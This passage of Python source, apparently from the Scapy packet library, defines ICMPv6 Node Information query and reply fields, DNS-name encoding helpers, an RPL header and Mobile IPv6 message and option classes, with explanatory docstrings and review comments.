2399# "The type of information present in the Data field of a query is
2400#  declared by the ICMP Code, whereas the type of information in a
2401#  Reply is determined by the Qtype"
2402
def names2dnsrepr(x):
    """
    Take as input a list of DNS names or a single DNS name
    and encode it in DNS format (without compression).

    Names may be given as bytes or str; str values are encoded to bytes
    first. A single value that already ends with a null byte is assumed
    to be DNS-encoded and is returned unmodified. A name made of a single
    component gets one extra null byte after its terminator.

    :param x: a name, or an iterable of names
    :return: the concatenated DNS-encoded names, as bytes
    !!!  At the moment, compression is not implemented  !!!
    """

    if isinstance(x, str):
        x = x.encode()
    if isinstance(x, bytes):
        if x and x[-1:] == b'\x00':  # stupid heuristic
            return x
        x = [x]

    res = []
    for n in x:
        if isinstance(n, str):
            # Without this, a str name fails on the bytes operations below
            n = n.encode()
        labels = n.split(b'.')
        termin = b"\x00"
        if len(labels) == 1:  # single-component gets one more
            termin += b'\x00'
        encoded = b"".join(struct.pack("!B", len(y)) + y for y in labels)
        res.append(encoded + termin)
    return b"".join(res)
2425
2426
def dnsrepr2names(x):
    """
    Take as input a DNS encoded byte string and return the list of
    DNS names contained in it.

    Each name is a sequence of length-prefixed labels closed by a null
    byte; a second null byte directly after the terminator is skipped.
    A last name that is not closed by a null byte (e.g. truncated data)
    is still returned instead of being dropped.

    :param x: DNS encoded names, as bytes
    :return: list of names (bytes, labels joined with b".")
    :raises Exception: when a length byte has one of its two upper bits
        set, i.e. compression is not supported
    """
    res = []
    cur = b""
    while x:
        tmp_len = x[0]
        x = x[1:]
        if not tmp_len:
            if cur and cur[-1:] == b'.':
                cur = cur[:-1]
            res.append(cur)
            cur = b""
            if x and x[0] == 0:  # single component
                x = x[1:]
            continue
        if tmp_len & 0xc0:  # XXX TODO : work on that -- arno
            raise Exception("DNS message can't be compressed at this point!")
        cur += x[:tmp_len] + b"."
        x = x[tmp_len:]
    if cur:
        # Input ended without a terminator: keep what was decoded, minus
        # the trailing separator added after the last label
        res.append(cur[:-1])
    return res
2453
2454
class NIQueryDataField(StrField):
    """
    Data field of ICMPv6 Node Information Queries.

    The internal value is a ``(type, value)`` pair: type 0 holds an IPv6
    address in printable form, type 2 an IPv4 address in printable form
    and type 1 a name already encoded in DNS format.
    """

    def __init__(self, name, default):
        StrField.__init__(self, name, default)

    def i2h(self, pkt, x):
        """Return the address, or the first decoded DNS name, held by x."""
        if x is None:
            return x
        t, val = x
        if t == 1:
            # An empty Data field decodes to no name at all: report an
            # empty name instead of raising IndexError
            names = dnsrepr2names(val)
            val = names[0] if names else b""
        return val

    def h2i(self, pkt, x):
        """
        Convert a user supplied value to the internal (type, value) pair.

        A tuple whose first element is an int is taken as an explicit
        (type, value) pair and returned unchanged. Otherwise the value is
        tried as an IPv6 address, then as an IPv4 address, and finally
        encoded as a DNS name.
        """
        # The previous test, "x is tuple", compared x with the tuple type
        # itself and was never true, so explicit pairs were not accepted
        if isinstance(x, tuple) and x and isinstance(x[0], int):
            return x

        # Try IPv6
        try:
            inet_pton(socket.AF_INET6, x.decode())
            return (0, x.decode())
        except Exception:
            pass
        # Try IPv4
        try:
            inet_pton(socket.AF_INET, x.decode())
            return (2, x.decode())
        except Exception:
            pass
        # Try DNS
        if x is None:
            x = b""
        x = names2dnsrepr(x)
        return (1, x)

    def i2repr(self, pkt, x):
        """Return a printable form of the internal (type, value) pair."""
        t, val = x
        if t == 1:  # DNS Name
            # we don't use dnsrepr2names() to deal with
            # possible weird data extracted info
            res = []
            while val:
                tmp_len = orb(val[0])
                val = val[1:]
                if tmp_len == 0:
                    break
                res.append(plain_str(val[:tmp_len]) + ".")
                val = val[tmp_len:]
            tmp = "".join(res)
            if tmp and tmp[-1] == '.':
                tmp = tmp[:-1]
            return tmp
        return repr(val)

    def getfield(self, pkt, s):
        """
        Dissect the Data field from s.

        The "qtype" and "code" values of pkt select the decoding: nothing
        is consumed for qtype 0, 16 bytes are read as an IPv6 address for
        code 0, 4 bytes as an IPv4 address for code 2, and everything
        that remains is kept as a DNS encoded name for any other code.
        """
        qtype = getattr(pkt, "qtype")
        if qtype == 0:  # NOOP
            return s, (0, b"")
        else:
            code = getattr(pkt, "code")
            if code == 0:   # IPv6 Addr
                return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16]))
            elif code == 2:  # IPv4 Addr
                return s[4:], (2, inet_ntop(socket.AF_INET, s[:4]))
            else:           # Name or Unknown
                return b"", (1, s)

    def addfield(self, pkt, s, val):
        """Append the wire form of the internal pair val to s."""
        # A missing value is built as an empty name
        if ((isinstance(val, tuple) and val[1] is None) or
                val is None):
            val = (1, b"")
        t = val[0]
        if t == 1:
            return s + val[1]
        elif t == 0:
            return s + inet_pton(socket.AF_INET6, val[1])
        else:
            return s + inet_pton(socket.AF_INET, val[1])
2532
2533
class NIQueryCodeField(ByteEnumField):
    """Code field whose value, when left to None, follows the "data" field."""

    def i2m(self, pkt, x):
        """
        Return x when it is set. Otherwise derive the code from the type
        stored in the "data" field of pkt: 0 for an IPv6 address, 2 for an
        IPv4 address and 1 (name) in every other case, missing data included.
        """
        if x is not None:
            return x
        d = pkt.getfieldval("data")
        if d is not None:
            kind = d[0]
            if kind == 0:  # IPv6 address
                return 0
            if kind == 2:  # IPv4 address
                return 2
        return 1  # Name, unknown type or no data
2549
2550
2551_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"}
2552
2553# _niquery_flags = {  2: "All unicast addresses", 4: "IPv4 addresses",
2554#                     8: "Link-local addresses", 16: "Site-local addresses",
2555#                    32: "Global addresses" }
2556
2557# "This NI type has no defined flags and never has a Data Field". Used
2558# to know if the destination is up and implements NI protocol.
2559
2560
# Node Information Query with qtype 0 (NOOP). The other Node Information
# Query classes derive from it and only override field defaults.
class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6):
    name = "ICMPv6 Node Information Query - NOOP Query"
    fields_desc = [ByteEnumField("type", 139, icmp6types),
                   # A code left to None is derived from "data" by
                   # NIQueryCodeField.i2m()
                   NIQueryCodeField("code", None, _niquery_code),
                   XShortField("cksum", None),
                   ShortEnumField("qtype", 0, icmp6_niqtypes),
                   # 10 unused bits followed by 6 flag bits
                   BitField("unused", 0, 10),
                   FlagsField("flags", 0, 6, "TACLSG"),
                   NonceField("nonce", None),
                   NIQueryDataField("data", None)]
2571
2572
# Node Information Query with qtype 2 ("Node Name"); all fields are
# inherited from ICMPv6NIQueryNOOP.
class ICMPv6NIQueryName(ICMPv6NIQueryNOOP):
    name = "ICMPv6 Node Information Query - IPv6 Name Query"
    qtype = 2
2576
2577# We ask for the IPv6 address of the peer
2578
2579
# Node Information Query with qtype 3 ("IPv6 Address"); all fields are
# inherited from ICMPv6NIQueryNOOP.
class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP):
    name = "ICMPv6 Node Information Query - IPv6 Address Query"
    qtype = 3
    # 0x3E sets five of the six flag bits (all but the lowest one)
    flags = 0x3E
2584
2585
# Node Information Query with qtype 4 ("IPv4 Address"); all fields are
# inherited from ICMPv6NIQueryNOOP.
class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP):
    name = "ICMPv6 Node Information Query - IPv4 Address Query"
    qtype = 4
2589
2590
2591_nireply_code = {0: "Successful Reply",
2592                 1: "Response Refusal",
2593                 3: "Unknown query type"}
2594
2595_nireply_flags = {1: "Reply set incomplete",
2596                  2: "All unicast addresses",
2597                  4: "IPv4 addresses",
2598                  8: "Link-local addresses",
2599                  16: "Site-local addresses",
2600                  32: "Global addresses"}
2601
2602# Internal repr is one of those :
2603# (0, "some string") : unknown qtype value are mapped to that one
2604# (3, [ (ttl, ip6), ... ])
2605# (4, [ (ttl, ip4), ... ])
2606# (2, [ttl, dns_names]) : dns_names is one string that contains
2607#     all the DNS names. Internally it is kept ready to be sent
2608#     (undissected). i2repr() decode it for user. This is to
2609#     make build after dissection bijective.
2610#
2611# I also merged getfield() and m2i(), and addfield() and i2m().
2612
2613
class NIReplyDataField(StrField):
    """
    Data field of ICMPv6 Node Information Replies.

    The internal value is a (qtype, value) pair. For qtype 2 the value is
    [ttl, names] with names kept in DNS format; for qtype 3 and 4 it is a
    list of (ttl, address) tuples; for anything else it is kept as is.
    """

    def i2h(self, pkt, x):
        """Return the value part of x; DNS names are decoded for qtype 2."""
        if x is None:
            return x
        kind, payload = x
        if kind != 2:
            return payload
        ttl, encoded = payload
        return [ttl] + dnsrepr2names(encoded)

    def h2i(self, pkt, x):
        """
        Convert a user supplied value to the internal (qtype, value) pair.

        A tuple is taken as an explicit (qtype, value) hint. Otherwise the
        qtype of pkt is used, or 0 (plain string) when there is no packet.
        """
        if isinstance(x, tuple):
            qtype, x = x[0], x[1]
        elif pkt is not None:
            # No user hint, let's use 'qtype' value for that purpose
            qtype = pkt.qtype
        else:
            qtype = 0

        # From that point on, x is the value (second element of the tuple)

        if qtype == 2:  # DNS name
            if isinstance(x, (str, bytes)):  # listify the string
                x = [x]
            if isinstance(x, list):
                x = [item.encode() if isinstance(item, str) else item
                     for item in x]
            # An optional leading int is the ttl; it defaults to 0
            if x and isinstance(x[0], int):
                ttl, names = x[0], x[1:]
            else:
                ttl, names = 0, x
            return (2, [ttl, names2dnsrepr(names)])

        if qtype in [3, 4]:  # IPv4 or IPv6 addr
            if not isinstance(x, list):
                x = [x]  # User directly provided an IP, instead of list

            entries = []
            for entry in x:
                # List elements are not tuples, user probably
                # omitted ttl value : we will use 0 instead
                if not isinstance(entry, tuple):
                    entry = (0, entry)
                # Decode bytes
                if isinstance(entry[1], bytes):
                    entry = (entry[0], entry[1].decode())
                entries.append(entry)
            return (qtype, entries)

        return (qtype, x)

    def addfield(self, pkt, s, val):
        """Append the wire form of the internal pair val to s."""
        kind, payload = val
        if payload is None:
            payload = b""
        if kind == 2:
            ttl, dnsstr = payload
            return s + struct.pack("!I", ttl) + dnsstr
        if kind == 3 or kind == 4:
            family = socket.AF_INET6 if kind == 3 else socket.AF_INET
            # Each record is a 32-bit ttl followed by the packed address
            return s + b"".join(
                struct.pack("!I", rec[0]) + inet_pton(family, rec[1])
                for rec in payload
            )
        return s + payload

    def getfield(self, pkt, s):
        """
        Dissect the Data field from s, according to the "code" and "qtype"
        values of pkt. Nothing is decoded when code is not 0 or qtype is 0.
        """
        if pkt.code != 0:
            return s, (0, b"")

        qtype = pkt.qtype
        if qtype == 0:  # NOOP
            return s, (0, b"")

        if qtype == 2:
            if len(s) < 4:
                return s, (0, b"")
            (ttl,) = struct.unpack("!I", s[:4])
            return b"", (2, [ttl, s[4:]])

        if qtype == 3 or qtype == 4:  # addresses with TTLs
            # XXX TODO : get the real length
            if qtype == 3:
                kind, family, size = 3, socket.AF_INET6, 20  # 4 + 16
            else:
                kind, family, size = 4, socket.AF_INET, 8  # 4 + 4
            records = []
            while len(s) >= size:
                (ttl,) = struct.unpack("!I", s[:4])
                records.append((ttl, inet_ntop(family, s[4:size])))
                s = s[size:]
            return s, (kind, records)

        # XXX TODO : implement me and deal with real length
        return b"", (0, s)

    def i2repr(self, pkt, x):
        """Return a printable form of the internal (qtype, value) pair."""
        if x is None:
            return "[]"

        if not (isinstance(x, tuple) and len(x) == 2):
            return repr(x)  # XXX should not happen

        kind, payload = x
        if kind == 2:  # DNS names
            ttl, encoded = payload
            names = [plain_str(name) for name in dnsrepr2names(encoded)]
            return "ttl:%d %s" % (ttl, ",".join(names))
        if kind == 3 or kind == 4:
            entries = ["(%d, %s)" % (rec[0], rec[1]) for rec in payload]
            return "[ %s ]" % ", ".join(entries)
        return repr(payload)
2737
2738# By default, sent responses have code set to 0 (successful)
2739
2740
# Node Information Reply with qtype 0 (NOOP). The other Node Information
# Reply classes derive from it and only override field defaults.
class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6):
    name = "ICMPv6 Node Information Reply - NOOP Reply"
    fields_desc = [ByteEnumField("type", 140, icmp6types),
                   ByteEnumField("code", 0, _nireply_code),
                   XShortField("cksum", None),
                   ShortEnumField("qtype", 0, icmp6_niqtypes),
                   # 10 unused bits followed by 6 flag bits
                   BitField("unused", 0, 10),
                   FlagsField("flags", 0, 6, "TACLSG"),
                   NonceField("nonce", None),
                   NIReplyDataField("data", None)]
2751
2752
# Node Information Reply with qtype 2 ("Node Name"); all fields are
# inherited from ICMPv6NIReplyNOOP.
class ICMPv6NIReplyName(ICMPv6NIReplyNOOP):
    name = "ICMPv6 Node Information Reply - Node Names"
    qtype = 2
2756
2757
# Node Information Reply with qtype 3 ("IPv6 Address"); all fields are
# inherited from ICMPv6NIReplyNOOP.
class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP):
    name = "ICMPv6 Node Information Reply - IPv6 addresses"
    qtype = 3
2761
2762
# Node Information Reply with qtype 4 ("IPv4 Address"); all fields are
# inherited from ICMPv6NIReplyNOOP.
class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP):
    name = "ICMPv6 Node Information Reply - IPv4 addresses"
    qtype = 4
2766
2767
# Node Information Reply with code 1; _niquery_guesser() selects this class
# for replies carrying that code.
class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP):
    name = "ICMPv6 Node Information Reply - Responder refuses to supply answer"
    code = 1
2771
2772
# Node Information Reply with code 2; _niquery_guesser() selects this class
# for replies carrying that code.
class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP):
    name = "ICMPv6 Node Information Reply - Qtype unknown to the responder"
    code = 2
2776
2777
def _niquery_guesser(p):
    """
    Select the class used to dissect the Node Information message p.

    The first byte of p is the ICMPv6 type (139 for queries, 140 for
    replies), the second one the code, and bytes 4-5 the qtype.
    conf.raw_layer is returned when no dedicated class applies.
    """
    msg_type = orb(p[0])

    if msg_type == 139:  # Node Info Query specific stuff
        if len(p) > 6:
            qtype, = struct.unpack("!H", p[4:6])
            queries = {0: ICMPv6NIQueryNOOP,
                       2: ICMPv6NIQueryName,
                       3: ICMPv6NIQueryIPv6,
                       4: ICMPv6NIQueryIPv4}
            return queries.get(qtype, conf.raw_layer)
        return conf.raw_layer

    if msg_type == 140:  # Node Info Reply specific stuff
        code = orb(p[1])
        if code == 1:
            return ICMPv6NIReplyRefuse
        if code == 2:
            return ICMPv6NIReplyUnknown
        if code == 0 and len(p) > 6:
            qtype, = struct.unpack("!H", p[4:6])
            replies = {2: ICMPv6NIReplyName,
                       3: ICMPv6NIReplyIPv6,
                       4: ICMPv6NIReplyIPv4}
            return replies.get(qtype, ICMPv6NIReplyNOOP)

    return conf.raw_layer
2801
2802
2803#############################################################################
2804#############################################################################
2805#     Routing Protocol for Low Power and Lossy Networks RPL (RFC 6550)      #
2806#############################################################################
2807#############################################################################
2808
2809# https://www.iana.org/assignments/rpl/rpl.xhtml#control-codes
# Labels of the "code" values used by RPL control messages
rplcodes = {
    0: "DIS",
    1: "DIO",
    2: "DAO",
    3: "DAO-ACK",
    # 4: "P2P-DRO",
    # 5: "P2P-DRO-ACK",
    # 6: "Measurement",
    7: "DCO",
    8: "DCO-ACK",
}
2819
2820
# RPL control message header: ICMPv6 type 155, with the code labelled
# through rplcodes.
class ICMPv6RPL(_ICMPv6):   # RFC 6550
    name = 'RPL'
    fields_desc = [ByteEnumField("type", 155, icmp6types),
                   ByteEnumField("code", 0, rplcodes),
                   XShortField("cksum", None)]
    # Defaults applied to an underlying IPv6 layer: next header 58 and
    # destination ff02::1a
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1a"}}
2827
2828
2829#############################################################################
2830#############################################################################
2831#               Mobile IPv6 (RFC 3775) and Nemo (RFC 3963)                  #
2832#############################################################################
2833#############################################################################
2834
2835# Mobile IPv6 ICMPv6 related classes
2836
# Home Agent Address Discovery Request (ICMPv6 type 144).
class ICMPv6HAADRequest(_ICMPv6):
    name = 'ICMPv6 Home Agent Address Discovery Request'
    fields_desc = [ByteEnumField("type", 144, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XShortField("id", None),
                   # 1 flag bit followed by 15 reserved bits
                   BitEnumField("R", 1, 1, {1: 'MR'}),
                   XBitField("res", 0, 15)]

    def hashret(self):
        # "id" defaults to None, which struct.pack() rejects: hash an
        # unset id as 0 (presumably the value sent on the wire -- confirm)
        return struct.pack("!H", self.id or 0) + self.payload.hashret()
2848
2849
# Home Agent Address Discovery Reply (ICMPv6 type 145).
class ICMPv6HAADReply(_ICMPv6):
    name = 'ICMPv6 Home Agent Address Discovery Reply'
    fields_desc = [ByteEnumField("type", 145, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XShortField("id", None),
                   # 1 flag bit followed by 15 reserved bits
                   BitEnumField("R", 1, 1, {1: 'MR'}),
                   XBitField("res", 0, 15),
                   IP6ListField('addresses', None)]

    def hashret(self):
        # "id" defaults to None, which struct.pack() rejects: hash an
        # unset id as 0 (presumably the value sent on the wire -- confirm)
        return struct.pack("!H", self.id or 0) + self.payload.hashret()

    def answers(self, other):
        # Only a HAAD Request carrying the same id is answered
        if not isinstance(other, ICMPv6HAADRequest):
            return 0
        return self.id == other.id
2867
2868
# Mobile Prefix Solicitation (ICMPv6 type 146).
class ICMPv6MPSol(_ICMPv6):
    name = 'ICMPv6 Mobile Prefix Solicitation'
    fields_desc = [ByteEnumField("type", 146, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XShortField("id", None),
                   XShortField("res", 0)]

    # NOTE(review): this method is named _hashret, not hashret as on the
    # neighbouring HAAD and MPAdv classes, so it presumably does not take
    # part in request/answer matching -- confirm whether this is intended.
    def _hashret(self):
        return struct.pack("!H", self.id)
2879
2880
# Mobile Prefix Advertisement (ICMPv6 type 147).
class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6):
    name = 'ICMPv6 Mobile Prefix Advertisement'
    fields_desc = [ByteEnumField("type", 147, icmp6types),
                   ByteField("code", 0),
                   XShortField("cksum", None),
                   XShortField("id", None),
                   # 2 flag bits followed by 14 reserved bits
                   BitEnumField("flags", 2, 2, {2: 'M', 1: 'O'}),
                   XBitField("res", 0, 14)]

    def hashret(self):
        # "id" defaults to None, which struct.pack() rejects: hash an
        # unset id as 0 (presumably the value sent on the wire -- confirm)
        return struct.pack("!H", self.id or 0)

    def answers(self, other):
        # Any Mobile Prefix Solicitation is accepted; ids are not compared
        return isinstance(other, ICMPv6MPSol)
2895
2896# Mobile IPv6 Options classes
2897
2898
2899_mobopttypes = {2: "Binding Refresh Advice",
2900                3: "Alternate Care-of Address",
2901                4: "Nonce Indices",
2902                5: "Binding Authorization Data",
2903                6: "Mobile Network Prefix (RFC3963)",
2904                7: "Link-Layer Address (RFC4068)",
2905                8: "Mobile Node Identifier (RFC4283)",
2906                9: "Mobility Message Authentication (RFC4285)",
2907                10: "Replay Protection (RFC4285)",
2908                11: "CGA Parameters Request (RFC4866)",
2909                12: "CGA Parameters (RFC4866)",
2910                13: "Signature (RFC4866)",
2911                14: "Home Keygen Token (RFC4866)",
2912                15: "Care-of Test Init (RFC4866)",
2913                16: "Care-of Test (RFC4866)"}
2914
2915
class _MIP6OptAlign(Packet):
    """ Base class of the Mobile IPv6 options, whose alignment
    requirements have the form x*n+y. Subclasses only provide x and y as
    class parameters (x=0 and y=0 mean that no alignment is required);
    alignment_delta() then tells how much padding, i.e. a Pad1 or PadN
    option, is needed before the option."""

    __slots__ = ["x", "y"]

    def alignment_delta(self, curpos):
        """Return the number of padding bytes needed when the option
        would otherwise start at offset curpos."""
        x, y = self.x, self.y
        if x == 0 and y == 0:
            return 0
        # Number of x-sized blocks needed to reach or pass (curpos - y)
        blocks = (curpos - y + x - 1) // x
        return x * blocks + y - curpos

    def extract_padding(self, p):
        """Hand all the remaining bytes back as padding, none as payload."""
        return b"", p
2935
2936
# Binding Refresh Advice option (otype 2): a fixed olen of 2 followed by
# one 16-bit "rinter" value.
class MIP6OptBRAdvice(_MIP6OptAlign):
    name = 'Mobile IPv6 Option - Binding Refresh Advice'
    fields_desc = [ByteEnumField('otype', 2, _mobopttypes),
                   ByteField('olen', 2),
                   ShortField('rinter', 0)]
    x = 2
    y = 0  # alignment requirement: 2n
2944
2945
# Alternate Care-of Address option (otype 3): a fixed olen of 16 followed
# by one IPv6 address.
class MIP6OptAltCoA(_MIP6OptAlign):
    name = 'MIPv6 Option - Alternate Care-of Address'
    fields_desc = [ByteEnumField('otype', 3, _mobopttypes),
                   ByteField('olen', 16),
                   IP6Field("acoa", "::")]
    x = 8
    y = 6  # alignment requirement: 8n+6
2953
2954
# Nonce Indices option (otype 4): home ("hni") and care-of ("coni") nonce
# indices.
class MIP6OptNonceIndices(_MIP6OptAlign):
    name = 'MIPv6 Option - Nonce Indices'
    fields_desc = [ByteEnumField('otype', 4, _mobopttypes),
                   # NOTE(review): olen defaults to 16 although only two
                   # ShortFields follow -- confirm the expected Option
                   # Length against the Mobile IPv6 specification
                   ByteField('olen', 16),
                   ShortField('hni', 0),
                   ShortField('coni', 0)]
    x = 2
    y = 0  # alignment requirement: 2n
2963
2964
# Binding Authorization Data option (otype 5) carrying a 96-bit
# authenticator.
class MIP6OptBindingAuthData(_MIP6OptAlign):
    name = 'MIPv6 Option - Binding Authorization Data'
    fields_desc = [ByteEnumField('otype', 5, _mobopttypes),
                   # NOTE(review): olen defaults to 16 although the
                   # authenticator below is 96 bits (12 bytes) long --
                   # confirm the expected Option Length
                   ByteField('olen', 16),
                   BitField('authenticator', 0, 96)]
    x = 8
    y = 2  # alignment requirement: 8n+2
2972
2973
# Mobile Network Prefix option (otype 6): a reserved byte, a prefix length
# defaulting to 64 and an IPv6 prefix.
class MIP6OptMobNetPrefix(_MIP6OptAlign):  # NEMO - RFC 3963
    name = 'NEMO Option - Mobile Network Prefix'
    fields_desc = [ByteEnumField("otype", 6, _mobopttypes),
                   ByteField("olen", 18),
                   ByteField("reserved", 0),
                   ByteField("plen", 64),
                   IP6Field("prefix", "::")]
    x = 8
    y = 4  # alignment requirement: 8n+4
2983
2984
# Link-Layer Address option (otype 7): an option code, one pad byte and a
# MAC address.
class MIP6OptLLAddr(_MIP6OptAlign):  # Sect 6.4.4 of RFC 4068
    name = "MIPv6 Option - Link-Layer Address (MH-LLA)"
    fields_desc = [ByteEnumField("otype", 7, _mobopttypes),
                   ByteField("olen", 7),
                   ByteEnumField("ocode", 2, _rfc4068_lla_optcode),
                   ByteField("pad", 0),
                   MACField("lla", ETHER_ANY)]  # Only support ethernet
    x = 0
    y = 0  # alignment requirement: none
2994
2995
# Mobile Node Identifier option (otype 8). "olen" is computed as the length
# of "id" plus 1 and, on dissection, "id" is read as olen - 1 bytes.
class MIP6OptMNID(_MIP6OptAlign):  # RFC 4283
    name = "MIPv6 Option - Mobile Node Identifier"
    fields_desc = [ByteEnumField("otype", 8, _mobopttypes),
                   FieldLenField("olen", None, length_of="id", fmt="B",
                                 adjust=lambda pkt, x: x + 1),
                   ByteEnumField("subtype", 1, {1: "NAI"}),
                   StrLenField("id", "",
                               length_from=lambda pkt: pkt.olen - 1)]
    x = 0
    y = 0  # alignment requirement: none
3006
3007# We only support decoding and basic build. Automatic HMAC computation is
3008# too much work for our current needs. It is left to the user (I mean ...
3009# you). --arno
3010
3011
# Mobility Message Authentication option (otype 9). "olen" is computed as
# the length of "authdata" plus 5 and, on dissection, "authdata" is read as
# olen - 5 bytes.
class MIP6OptMsgAuth(_MIP6OptAlign):  # RFC 4285 (Sect. 5)
    name = "MIPv6 Option - Mobility Message Authentication"
    fields_desc = [ByteEnumField("otype", 9, _mobopttypes),
                   FieldLenField("olen", None, length_of="authdata", fmt="B",
                                 adjust=lambda pkt, x: x + 5),
                   ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option",  # noqa: E501
                                                2: "MN-AAA authentication mobility option"}),  # noqa: E501
                   IntField("mspi", None),
                   StrLenField("authdata", "A" * 12,
                               length_from=lambda pkt: pkt.olen - 5)]
    x = 4
    y = 1  # alignment requirement: 4n+1
3024
3025# Extracted from RFC 1305 (NTP) :
3026# NTP timestamps are represented as a 64-bit unsigned fixed-point number,
3027# in seconds relative to 0h on 1 January 1900. The integer part is in the
3028# first 32 bits and the fraction part in the last 32 bits.
3029
3030
class NTPTimestampField(LongField):
    """
    64-bit NTP timestamp: seconds since 0h on 1 January 1900 in the upper
    32 bits, fraction of a second in the lower 32 bits.
    """

    def i2repr(self, pkt, x):
        """
        Return x as a UTC date followed by the raw value.

        Values earlier than 50 years of 365 days after the NTP epoch are
        not converted and only reported with their raw value.
        """
        if x < ((50 * 31536000) << 32):
            return "Some date a few decades ago (%d)" % x

        # Seconds from the NTP epoch (1900-01-01 00:00:00 UTC) to the Unix
        # epoch (1970-01-01 00:00:00 UTC): 25567 days of 86400 seconds.
        # The value used previously, 2209075761, was 86961 seconds too
        # large, so displayed dates were off by a little more than a day.
        delta = -2208988800
        i = int(x >> 32)
        j = float(x & 0xffffffff) * 2.0**-32
        res = i + j + delta
        t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(res))

        return "%s (%d)" % (t, x)
3045
3046
# Replay Protection option (otype 10): a fixed olen of 8 followed by one
# NTPTimestampField.
class MIP6OptReplayProtection(_MIP6OptAlign):  # RFC 4285 (Sect. 6)
    name = "MIPv6 option - Replay Protection"
    fields_desc = [ByteEnumField("otype", 10, _mobopttypes),
                   ByteField("olen", 8),
                   NTPTimestampField("timestamp", 0)]
    x = 8
    y = 2  # alignment requirement: 8n+2
3054
3055
# CGA Parameters Request option (otype 11): type and a zero length only.
class MIP6OptCGAParamsReq(_MIP6OptAlign):  # RFC 4866 (Sect. 5.6)
    name = "MIPv6 option - CGA Parameters Request"
    fields_desc = [ByteEnumField("otype", 11, _mobopttypes),
                   ByteField("olen", 0)]
    x = 0
    y = 0  # alignment requirement: none
3062
3063# XXX TODO: deal with CGA param fragmentation and build of defragmented
3064# XXX       version. Passing of a big CGAParam structure should be
3065# XXX       simplified. Make it hold packets, by the way  --arno
3066
3067
# CGA Parameters option (otype 12): "olen" is computed from, and on
# dissection gives, the length of the "cgaparams" string.
class MIP6OptCGAParams(_MIP6OptAlign):  # RFC 4866 (Sect. 5.1)
    name = "MIPv6 option - CGA Parameters"
    fields_desc = [ByteEnumField("otype", 12, _mobopttypes),
                   FieldLenField("olen", None, length_of="cgaparams", fmt="B"),
                   StrLenField("cgaparams", "",
                               length_from=lambda pkt: pkt.olen)]
    x = 0
    y = 0  # alignment requirement: none
3076
3077
# Signature option (otype 13): "olen" is computed from, and on dissection
# gives, the length of the "sig" string.
class MIP6OptSignature(_MIP6OptAlign):  # RFC 4866 (Sect. 5.2)
    name = "MIPv6 option - Signature"
    fields_desc = [ByteEnumField("otype", 13, _mobopttypes),
                   FieldLenField("olen", None, length_of="sig", fmt="B"),
                   StrLenField("sig", "",
                               length_from=lambda pkt: pkt.olen)]
    x = 0
    y = 0  # alignment requirement: none
3086
3087
# Home Keygen Token option (otype 14): "olen" is computed from, and on
# dissection gives, the length of the "hkt" string.
class MIP6OptHomeKeygenToken(_MIP6OptAlign):  # RFC 4866 (Sect. 5.3)
    name = "MIPv6 option - Home Keygen Token"
    fields_desc = [ByteEnumField("otype", 14, _mobopttypes),
                   FieldLenField("olen", None, length_of="hkt", fmt="B"),
                   StrLenField("hkt", "",
                               length_from=lambda pkt: pkt.olen)]
    x = 0
    y = 0  # alignment requirement: none
3096
3097
# Care-of Test Init option (otype 15): type and a zero length only.
class MIP6OptCareOfTestInit(_MIP6OptAlign):  # RFC 4866 (Sect. 5.4)
    name = "MIPv6 option - Care-of Test Init"
    fields_desc = [ByteEnumField("otype", 15, _mobopttypes),
                   ByteField("olen", 0)]
    x = 0
    y = 0  # alignment requirement: none
3104
3105
# Care-of Test option (otype 16): "olen" is computed from, and on
# dissection gives, the length of the "cokt" string, which defaults to 8
# null bytes.
class MIP6OptCareOfTest(_MIP6OptAlign):  # RFC 4866 (Sect. 5.5)
    name = "MIPv6 option - Care-of Test"
    fields_desc = [ByteEnumField("otype", 16, _mobopttypes),
                   FieldLenField("olen", None, length_of="cokt", fmt="B"),
                   StrLenField("cokt", b'\x00' * 8,
                               length_from=lambda pkt: pkt.olen)]
    x = 0
    y = 0  # alignment requirement: none
3114
3115
class MIP6OptUnknown(_MIP6OptAlign):
    """Generic Mobility Option: a type, a length and "olen" bytes of data.
    It also dispatches dissection to the class registered in moboptcls
    for the option type found in the first byte."""

    name = 'Scapy6 - Unknown Mobility Option'
    fields_desc = [
        ByteEnumField("otype", 6, _mobopttypes),
        FieldLenField("olen", None, length_of="odata", fmt="B"),
        StrLenField("odata", "", length_from=lambda pkt: pkt.olen),
    ]
    x = 0
    y = 0  # alignment requirement: none

    @classmethod
    def dispatch_hook(cls, _pkt=None, *_, **kargs):
        """Return the class registered in moboptcls for the option type in
        the first byte of _pkt, or this class when there is none."""
        if not _pkt:
            return cls
        otype = orb(_pkt[0])  # Option type
        if otype in moboptcls:
            return moboptcls[otype]
        return cls
3132
3133
# Option type -> class used to dissect it (see MIP6OptUnknown.dispatch_hook)
moboptcls = {
    0: Pad1,
    1: PadN,
    2: MIP6OptBRAdvice,
    3: MIP6OptAltCoA,
    4: MIP6OptNonceIndices,
    5: MIP6OptBindingAuthData,
    6: MIP6OptMobNetPrefix,
    7: MIP6OptLLAddr,
    8: MIP6OptMNID,
    9: MIP6OptMsgAuth,
    10: MIP6OptReplayProtection,
    11: MIP6OptCGAParamsReq,
    12: MIP6OptCGAParams,
    13: MIP6OptSignature,
    14: MIP6OptHomeKeygenToken,
    15: MIP6OptCareOfTestInit,
    16: MIP6OptCareOfTest,
}
3151
3152
3153# Main Mobile IPv6 Classes
3154
# Labels of the Mobility Header message types ("mhtype" field)
mhtypes = {
    0: 'BRR',
    1: 'HoTI',
    2: 'CoTI',
    3: 'HoT',
    4: 'CoT',
